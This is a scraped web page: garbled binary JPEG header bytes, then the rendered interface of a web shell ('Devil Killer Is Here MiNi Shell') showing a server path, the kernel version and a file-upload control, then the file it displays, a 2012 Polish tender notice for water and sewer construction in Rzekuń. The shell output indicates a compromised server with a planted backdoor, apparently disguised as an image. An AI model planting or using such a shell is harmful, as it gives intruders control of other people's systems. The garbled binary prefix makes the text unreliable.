JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120302/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120302/65330-N-2012.html

<p class="kh_header"><b>Rzekuń: Budowa sieci  wodno - kanalizacyjnej z przyłączami w obrębie miejscowości Rzekuń, Tobolice, Czarnowiec gm. Rzekuń</b><br>
<b>Numer ogłoszenia: 65330 - 2012; data zamieszczenia: 02.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Rzekuń , ul. Kościuszki 33, 07-411 Rzekuń, woj. mazowieckie, tel. 29 7617301 w. 47, faks 29 7617302.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa sieci  wodno - kanalizacyjnej z przyłączami w obrębie miejscowości Rzekuń, Tobolice, Czarnowiec gm. Rzekuń.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Budowa sieci  wodno - kanalizacyjnej z przyłączami w obrębie miejscowości Rzekuń, Tobolice, Czarnowiec gm. Rzekuń w skład którego wchodzą zadania rozbudowy sieci wodociągowej w miejscowości Czarnowiec, w miejscowości Tobolice oraz rozbudowa sieci kanalizacji sanitarnej grawitacyjno-ciśnieniowej w Rzekuniu. Zadanie realizowane jest ramach działania 321 Podstawowe usługi dla gospodarki wiejskiej i ludności objętego Programem Rozwoju Obszarów Wiejskich na lata 2007-2013.

Zadanie 1 Rozbudowa sieci wodociągowej z przyłączami w miejscowości Tobolice:
Zadanie obejmuję rozbudowę sieci wodociągowej w technologii PVC i PE o łącznej długości 2 624,0 mb., z przyłączami do granic posesji zakończonych zaślepkami w ilości      28 szt. i łącznej długości 92,0 mb. W skład zadania wchodzi:
sieć wodociągowa z rur PVC o śr. 160 mm - 1390,0 mb.,
sieć wodociągowa z rur PVC o śr. 110 mm - 879,0 mb.,
sieć wodociągowa z rur PVC o śr. 90 mm - 289,0 mb.,
sieć wodociągowa z rur trójwarstwowych PE Wavin TS SDR 11 o śr. 160 mm - 66,0 mb., przecisk sterowany
przyłącza wodociągowe z rur PE o śr. 40 mm - 92,0 mb., o połączeniach mechanicznych do granicy działki
montaż zasuw z żeliwa sferoidalnego o śr. 150 mm - 7 kpl
montaż zasuw sferoidalnego o śr. 100 mm - 4 kpl
montaż zasuw sferoidalnego o śr. 80 mm - 1 kpl
montaż hydrantów p. poż. nadziemne z żeliwa sferoidalnego z podwójnym zamknięciem wypływu wody w przypadku złamania o śr. 80 mm - 14 kpl
Przejścia przez przeszkody metodą przecisku przy użyciu młota pneumatycznego:
- rury o śr. zewn. 219 mm - 29 m -4 szt
- rury o śr. zewn. 273 mm - 62 m- 6 szt
- rury o śr. zewn. 114 mm - 24 m- 4 szt

Zadanie 2 Rozbudowa sieci wodociągowej w miejscowości Czarnowiec:
Zadanie obejmuję rozbudowę sieci wodociągowej w technologii PVC o łącznej długości 1 803,0 mb. W skład zadania wchodzi:
Rury PVC o śr. 110 mm - 1803 m
Zasuwy z żeliwa sferoidalnego o śr. 100 mm - 2 kpl
Przejścia przez przeszkody metodą przecisku przy użyciu młota pneumatycznego :
- rury o śr. zewn. 219 mm - 24 m- 4 szt
Przejścia przez przeszkody metodą wykopu otwartego :
- rury o śr. zewn. 219 mm - 9 m- 2 szt.

Zadanie 3 Rozbudowa sieci kanalizacji sanitarnej grawitacyjno-ciśnieniowej z przyłączami w Rzekuniu:
Zadanie obejmuję rozbudowę sieci kanalizacji sanitarnej grawitacyjno - ciśnieniowej w technologii PVC i PE o łącznej długości 4 341,0 mb. z przyłączami zakończonymi studzienka rewizyjną w ilości 172 szt. i długości 1 304,0 mb.
Rurociąg grawitacyjny
Rury PVC typ S lite o śr. 200 mm - 3788,5 m
Studnie kanalizacyjne o śr. 600 mm - 109 kpl
Studnie kanalizacyjne o śr. 1000 mm - 53 kpl
Rurociąg tłoczny
Rury PE o śr. 90 mm - 552,5 m o połączeniach zgrzewanych
Przyłącza kanalizacyjne odcinek od studni na sieci do studni na posesji
Rury PVC  lite  typ S o śr. 160 mm - 1304 m
Studnie PVC o śr. 160 400 mm - 172 kpl
	Zamknięcie studni :
teleskop z włazem typ D-400 - 172 szt
Przepompownie
P8: zbiornik z polimerobetonu o śr. 1200 mm z pompą typ FA 08.22W lub równoważną wraz z rurociągami , armaturą i szafą z automatyką sterującą
Zaprojektowanie i wykonanie przyłącza energetycznego do zasilania przepompowni ścieków obejmującego zejście po słupie przewodem ASX-SN 4x16 mm2 z linii napowietrznej do złącza kontrolno-pomiarowego zamontowanego na słupie wykonanie linii kablowej kablem YKY 5x6 mm2 na odcinku od złącza kontrolno-pomiarowego zamontowanego na słupie linii nn do szafki sterującej będącej w dostawie przepompowni.

Specyfikacja przepompowni, szafy sterowniczej i monitoringu pracy przepompowni.
I. Przepompownia
1. Zbiornik monolityczny przejezdny z polimerobetonu ze skosami.
Całkowita wysokość zbiornika zgodnie z dokumentacją techniczną,
Wewnętrzna średnica zbiornika dla pompowni: 1,2 Dzb = 1200mm, 
Typ konstrukcji zbiornika - ciężka o parametrach technicznych:
- wytrzymałość na ściskanie 90-120 N mm2,
- wytrzymałość na zginanie 18-20 N mm2,
- odporność chemiczna 1-10 pH
- gęstość 2,3 g cm3,
- posiada aprobatę techniczną bądź znak CE,
- otwory pod rurociągi i przejścia kablowe są wykonane jako szczelne,
- średnica obudowy zapewni możliwość swobodnego montażu pomp oraz wyposażenia wewnętrznego przepompowni.

2. Wyposażenie zbiornika pompowni ścieków - uzbrojenie pompowni 
Rurociągi tłoczne ze stali  nierdzewnej gat. 304     1,4301; grubość ścianki 2mm
Kolana nierdzewne, Kołnierze stal nierdzewna gat. 304  1,4301 PN10 
Śruby nierdzewne, szpilki gat. A2 1,4301 
Łańcuch ze stali nierdzewnej gat. A2 1,4301
Właz przejezdny żeliwny DN 800 D400 z zabezpieczeniem przed kradzieżą z zamkami.
Drabina nierdzewna z szczeblami anty poślizgowymi - zgodna z PN gat. 304 (1,4301)
Kominek wentylacyjny ze stali nierdzewnej zt.2 gat. 304, (1,4301)
Prowadnice rurowe nierdzewne gat. 304   1,4301
złączka z zaworem do płukania rurociągu tłocznego z szybkozłączem do węża strażackiego -  średnica zaworu o 50 mm. 
Uszczelki chemoodporne
Deflektor nierdzewny gat. 304  1,4301; grubość blachy min 2mm
Zasuwa klinowa do ścieków z gumowanym klinem NBR; PN10
Zawór zwrotny kulowy do ścieków  np. SOCLA typ 408; PN10
Szybkozłącze RK  

3. Szczegółowa specyfikacja pomp do pompowni 
Zaproponowane pompy muszą być pompami wirowymi przeznaczonymi do pompowania ścieków komunalnych. Każda pompa z 10 m odcinkiem kabla.
Wymagania odnośnie pomp: 
silniki pomp o klasie izolacji H 09.
silniki pomp w pompowniach pośrednich  powinny być wykonane w obudowie z żeliwa zapewniającego dobre odprowadzanie ciepła i zatapialne.
wał pompy ze stali nierdzewnej  
stopień ochrony pomp IP 68,
zabezpieczenie silnika bimetaliczne  
każda pompa musi zostać wyposażona w zewnętrzny czujniki  wilgoci.
kabel do silnika uszczelniony żywicą lub innym materiałem uszczelniającym na wejściu do silnika,
wirniki typu Vortex muszą być przeznaczone do pompowania ścieków komunalnych, odlane z żeliwa szarego
wirniki pokryte specjalną powłoką ceramiczną o grubości  min 1,5  mm o przyczepności do żeliwa min 14 N mm2 zapewnia odporność na ścieranie i korozję lub z wykonane z materiału o twardości powyżej 63 Hrc
pompy zatapialne o min średnicy króćca tłocznego i ssącego DN 80.
Wszystkie pompy powinny posiadać podwójne uszczelnienie mechaniczne węglik krzemu/ węglik krzemu. 
Przekaźniki  do czujników wilgoci umieszczone w tablicy sterowniczej. Dzięki  temu inwestor otrzyma informację o zużyciu się uszczelnienia i będzie miał czas na reakcję.-zamówienie nowego uszczelnienia.
II. Szafa sterownicza
Szafa sterownicza powinna być wyposażona w n/w elementy: 
Sonda hydrostatyczna zintegrowana z przewodem,
Sygnalizatory poziomu ścieków w zbiorniku -  2 szt.,
Szafa zasilająca z tworzywa sztucznego z podwójnymi drzwiami w klasie szczelności min IP65 z cokołem do montażu na pokrywie zbiornika przepompowni lub z fundamentem do montażu obok zbiornika przepompowni:
-drugie drzwi wewnętrzne,
-ocieplenie szafy sterowniczej,
-przełącznik sieć-0-agregat,
-ogranicznik przepięć klasy C czteropolowy,
-ochronniki przepięciowe cewek przekaźników interfejsowych i cewek styczników
-przekaźnik kontroli symetrii i zaniku napięcia zasilania,
-tory zasilania pomp zabezpieczone wyłącznikiem różnicowo - prądowym i -indywidualnymi wyłącznikami silnikowym,
-złącze agregatu 400VAC/32A,
-styczniki robocze do toru zasilania pomp,
-wyłącznik różnicowo - prądowy indywidualne dla obwodów sterowniczych i obwodów zasilania elementów dodatkowych ,grzałka, gniazdo serwisowe,
wyłączniki nadmiarowo-prądowe zabezpieczające poszczególne obwody szafy sterowniczej indywidualne,
gniazdo serwisowe 230VAC,
przekaźniki interfejsowe 24V DC AC i 230V DC,
grzałka z termostatem,
czujnik otwarcia szafy,
zasilacz buforowy  24V DC z akumulatorowym podtrzymaniem po zaniku zasilania,
przełącznik rodzaju pracy automatyki: Ręczny - Wyłączone - Auto osobno dla każdej pompy,
niezależne przyciski start do uruchamiania każdej z pomp w trybie ręcznym oraz przełącznik blokady suchobiegu umożliwiający całkowite odpompowanie ścieków w trybie ręcznym,
sygnalizacja zewnętrzna akustyczno - optyczna do sygnalizacji stanów awaryjnych i włamania zasilana z napięcia 24V DC,
sterownik komunikacyjny GPRS do monitoringu pompowni w trybie GPRS protokół sieciowy UDP ,
sterownik przemysłowy PLC o budowie modułowej z możliwością rozbudowy o dodatkowe moduły wejść wyjść zasilany napięciem 24V DC o minimalnych zasobach jednostki bazowej: 16 wejść DI, 11 wyjść DO, 2 wejścia 4-20 mA i dwa wejścia uniwersalne albo cyfrowe albo napięciowe 0-10V 
sterownik powinien posiadać minimum 1 porty komunikacyjny szeregowy swobodnie programowalne 
port komunikacyjny sterownika powinny posiadać obsługę protokołu ModBUS RTU,
sterownik powinien posiadać pamięć nieulotną z możliwością zaimplementowania rejestratora oraz zegar RTC,
stany diagnostyczne sterownika powinny być wyświetlane na lokalnym wbudowanym podświetlanym panelu,
edycja programu sterownika powinna być możliwa bez zatrzymywania jego pracy,
sterownik powinien mięć możliwość zdalnego przeprogramowania i odczytania stanów diagnostycznych poprzez transmisję GPRS przy wykorzystaniu tego samego moduł telemetrycznego który obsługuje monitoring pompowni,
zakres temperatury pracy sterownika nie powinien być mniejszy niż od  -20 do +60stC;
zintegrowany panel operatorski z ekranem tekstowym minimum dwu linijkowy  z przyciskami funkcyjnymi, zasilany z napięcia 24V DC 
oznaczniki obwodów sekcji automatyki w szafie umożliwiające łatwą diagnostykę awarii i wymianę aparatów,
przekaźniki zawilgocenia i przegrzania uzwojeń silnika pomp,
lampki sygnalizujące stany pracy i awarii pomp, stanu zasilania oraz położenia czujników poziomu ,
zabezpieczenie obwodów 24VDC bezpiecznikami topikowymi,
opisy listwy zaciskowych i elementów wyposażenia szafy,
aparatura modułowa, elementy wykonawcze mocy powinny pochodzić od jednego producenta,
Zasilanie szafy sterowniczej należy wykonać w układzie sieci TN-S,
 
Szafa sterownicza powinna posiadać następującą funkcjonalność: 
Wszystkie przełączniki, przyciski, lampki sygnalizacyjne oraz  panel operatorski należy umieścić na drzwiach wewnętrznych szafy.
Sterowanie pracą za pomocą sterownika przemysłowego PLC z zintegrowanym panelem operatorskim z możliwością przesyłania danych w systemie GPRS poprzez   zewnętrzny sterownik komunikacyjny GPRS . 
Prezentacja stanu pompowni na panelu operatorskim HMI z funkcją alarmów obiektowych ,
Komunikacja RS232/ RS485,
Protokół komunikacyjny ModBUS RTU, 
Transmisja danych po GPRS zdarzeniowa oraz według określonego algorytmu pracy,
Zabezpieczenie pomp przed pracą na sucho, przed przeciążeniem i przeciwzwarciowo.
Układ sterowania przystosowany do współpracy z zabezpieczeniem silników pomp typu NIV101 kontrola temperatury i przecieku .
Zabezpieczenie automatyki szafy sterowniczej: przed przepięciami ogranicznik przepięć kl. C, ochronnik torów wejść cyfrowych, ochronniki cewek przekaźników interfejsowych i styczników oraz niezależne zabezpieczenie różnicowo - prądowe torów zasilania pomp i układów sterowniczych/zasilających szafy.
Pomiar poziomu sondą hydrostatyczną z możliwością zaprogramowania progów pracy pompowni oraz poziomu minimalnego/ suchobiegu ścieków w zbiorniku.
Dodatkowe zabezpieczenie na wypadek awarii sondy hydrostatycznej, zasilacza 24VDC lub sterownika PLC za pomocą sygnalizatorów poziomu w przypadku awarii sterowanie przejmuje układ sprzętowy, załączenie następuje od czujnika spiętrzenia, wyłączenie od czujnika suchobiegu.
Układ pozwalający w trybie ręcznym na całkowite odpompowanie ścieków ze zbiornika.
Układ samoczynnego odpompowania ścieków do poziomu minimalnego sondy w trybie automatycznym po postoju pompowni ponad 24 godziny.
Kontrola napięcia zasilania przekaźnikiem kontroli zaniku faz.
Możliwość dołączenia do sterownika przepływomierza z wyjściem impulsowym i analogowym,
Możliwość wykonywania rozkazów zdalnych: start/stop pompowni, skasuj alarm włamania, skasuj alarm zbiorczy, zdalne kasowanie liczników włączeń i czasu pracy pomp, opcjonalnie na życzenie Użytkownika powinna istnieć możliwość dodania innych rozkazów.
Funkcja ochrony antywłamaniowej poprzez monitoring otwarcia szafy sterowniczej z zaprogramowaną funkcją centralki alarmowej w sterowniku możliwość blokowania sygnału dźwiękowego zdalnie lub lokalnie,
Możliwość pracy pompowni w trybie automatycznym bezobsługowym lub ręcznym pod kontrola obsługi.
Licznik godzin pracy każdej pompy realizowana przez sterownik.
Licznik włączeń każdej z pomp realizowana przez sterownik.
Pomiar czasu ostatniego cyklu pracy pompy realizowany przez sterownik.
Rejestr ostatnich alarmów i zdarzeń dostępny z poziomu panela operatorskiego.
Zegar czasu rzeczywistego w sterowniku PLC z możliwością zmian czasu letni/zimowy,
Autoryzacja dostępu do nastaw na poziomie: operator tylko odczyt i serwis  po podaniu hasła z panelu operatorskiego,
Blokada jednoczesnej pracy obu pomp,
Możliwość wprowadzenia czasu pracy syreny akustycznej,
Sterownik powinien umożliwiać podłączenie przepływomierza, 
III. Komunikacja GSM/GPRS
Urządzenie bazujące na transmisji GSM/GPRS-SMS
Urządzenie powinno mieć kompaktową konstrukcję o niewielkich rozmiarach.
Transmiter GPRS powinien być przystosowany do montażu na szynie TH oraz posiadać metalową obudowę. 
Zakres napięć zasilania powinno wynosić od 8V do 30V DC
Wtyk zasilający powinien posiadać klucz uniemożliwiający wadliwe podłączenie
Urządzenie powinno posiadać wbudowany akumulator pozwalający na pracę przy zaniku zasilania zewnętrznego
Transmiter GPRS powinien posiadać minimum 2 porty RS232 z możliwością ustawienia parametrów transmisji zgodną z portem komunikacyjnym sterownika PLC
Transmiter powinien posiadać lampki LED sygnalizujące jego stan pracy
Transmiter powinien bezpośrednio przenosić informacje z danymi w dowolnym protokole komunikacyjnym przemysłowym z sieci GPRS na port RS232, powinno pracować jako przeźroczyste
Transmiter powinien obsługiwać protokół ModBUS RTU dla trybu pracy Master sterownika tzw. praca zdarzeniowa z możliwością zdefiniowania docelowego numeru IP i portu.
Tranmiter powinien mieć możliwość transmisji GPRS w protokole UDP 
Transmiter powinien posiadać 2 gniazda SIM i opcjonalnie obsługę 2 kart SIM niezależnych operatorów bez dodatkowej dopłaty
Transmiter musi posiadać rejestry statusowe informujące o poziomie sygnału radiowego GSM CSQ
Transmiter powinien automatycznie, niezależnie od sterownika nawiązywać sesję GPRS oraz posiadać konfigurowalny mechanizm autodiagnostyki sieci GPRS
Do transmitera GPRS powinno być dołączane bezpłatne oprogramowanie konfiguracyjne w języku polskim, umożliwiające konfigurację urządzenia bezpośrednio przez port RS232 lub zdalnie poprzez sieć GPRS.
Dostawca kart telemetrycznych pracujących w APNie zamkniętym powinien zapewnić wymiennie karty wszystkich trzech operatorów tzn. PLUS GSM, ORANGE i ERA przynależnych do jednego APNu. O doborze końcowym karty telemetrycznej danego operatora dla obiektu będzie decydować jakość zasięgu radiowego sieci GSM.
Oprogramowanie powinno pokazywać podstawowe parametry komunikacyjne m.in. poziom sygnału GSM. 
Firmware transmitera powinien umożliwiać aktualizację jego oprogramowania wewnętrznego przez użytkownika.

W ramach zamówienia Wykonawca będzie zobowiązany również do: 
udzielenia gwarancji na wykonane roboty budowlane na okres 60 miesięcy,  licząc od dnia końcowego odbioru robót,
prowadzenia robót zgodnie z Dokumentacją Budowy i Specyfikacjami Technicznymi Wykonania i Odbioru Robót Budowlanych,
wykonania na własny koszt wytyczenia trasy sieci i przyłączy, oraz obsługi geodezyjnej, 
wykonania na własny koszt inwentaryzacji geodezyjnej powykonawczej w                 3 egzemplarzach,
przedstawienia do zaakceptowania na piśmie dokumentacji techniczno - ruchowej (DTR) przepompowni ścieków przed jej montażem,
przedstawienia do akceptacji przed przystąpieniem aprobat technicznych, certyfikatów, świadectw dopuszczalności na wbudowane urządzenia i materiały budowlane 
przedstawienia protokołów badań wszystkich przewodów w zakresie szczelności na eksfiltrację ścieków do gruntu i filtrację wód gruntowych do kanału, badań gruntu wskaźnik zagęszczenia i instalacji elektrycznych,
wykonania badania wody,
wykonania inspekcji telewizyjnej sieci kanalizacji sanitarnej po jej wykonaniu wraz z raportem inspekcji, przy czym inspekcja ma potwierdzić prawidłowe wykonanie rurociągu. Zamawiający zastrzega sobie prawo wykonania inspekcji w trakcie procedur odbiorowych, w przypadku niezgodności w zapisach inspekcji potwierdzonych przez Inspektora Nadzoru, Zamawiający obciąży kosztem inspekcji Wykonawcę robót,
sporządzenia wykazu wykonanych przyłączy i przykanalików, na każdym zadaniu zawierającego: Lp.; Nazwisko i imię właściciela posesji; nr domu; nr działki; długość przyłącza, rzędne studzienki rewizyjnej,
poniesienia kosztów zajęcia pasa drogowego i opracowania projektu czasowej organizacji ruchu. Długość sieci w pasie drogi powiatowej nr 4403 W wynosi ok. 400,0  m, pozostała część sieci zawiera się w pasach dróg gminnych.
dokonania napraw wszelkich zniszczeń powstałych w trakcie realizacji zamówienia na własny koszt, swoim staraniem i w ramach niniejszego zamówienia,
odtworzenia uszkodzonych lub zniszczonych punktów geodezyjnych na własny koszt.
zamówienie powinno być zrealizowane zgodnie z obowiązującymi przepisami techniczno - budowlanymi, normami i wytycznymi, z materiałów dostarczonych przez Wykonawcę, odpowiadających wymogom wyrobów dopuszczonych do obrotu i stosowania  w budownictwie, określonych w ustawie Prawo Budowlane tj. posiadających certyfikat,
zapewnienia przejezdności dróg i utrzymania bezpieczeństwa terenu budowy, oraz robót poza placem budowy, a w szczególności: zabezpieczenia terenu budowy przed dostępem osób nieupoważnionych zapewniając bezpieczne dojścia i dojazdy do istniejących posesji.
Zapewnić wywóz ziemi z urobku po zastosowaniu wymiany gruntu na odległość do 2 km,
ewentualne zastosowane nazwy producentów w dokumentacji przetargowej służą doprecyzowaniu przedmiotu zamówienia. Wszystkie parametry w dokumentacji projektowej oraz specyfikacji technicznej wykonania i odbioru robót budowlanych określone są na poziomie minimalnym, tzn. Zamawiający dopuszcza zastosowanie materiałów o parametrach równoważnych czyli co najmniej takich jak podano w przedmiarze robót i specyfikacji technicznej wykonania i odbioru robót lecz nie gorszych.
zamawiający zaleca Wykonawcom przeprowadzenie wizji lokalnej i zebranie niezbędnych informacji do sporządzenia oferty. 
Wykonawca zrealizuje roboty zgodnie z zakresem rzeczowym ujętym w dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót oraz specyfikacji istotnych warunków zamówienia. 

Szczegółowy zakres robót do wykonania zawierają załączone do SIWZ,  tj. projekty budowlane, szczegółowe specyfikacje techniczne. Przedmiot zamówienia należy wykonać na podstawie w/w dokumentów zgodnie z obowiązującymi normami, przepisami..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.24.00-6, 45.23.21.50-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 52 716,54 tys. zł (słownie pięćdziesiąt dwa tysiące  siedemset szesnaści złotych  54/100).
2. Wykonawca może wnieść wadiumw  jednej lub kilku formach przewidzianych w art. 45 ust. 6 ustawy Pzp, tj.:
-pieniądzu,
-poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
-gwarancjach bankowych,
-gwarancjach ubezpieczeniowych,
-poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007r. Nr 42, poz. 275 ze zm.).
3. Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert dołączając do składanej oferty.
4. Wadium w pieniądzu należy wnieść przelewem  na konto Zamawiającego: Bank  Spółdzielczy Nr  35 8922 0009 0002 4673 2000 0020
5. W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego.
6. Warunki zwrotu wadium i utraty wadium reguluje art. 46 - Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia i dokumenty wg. metody spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia i dokumenty wg. metody spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia i dokumenty wg. metody spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
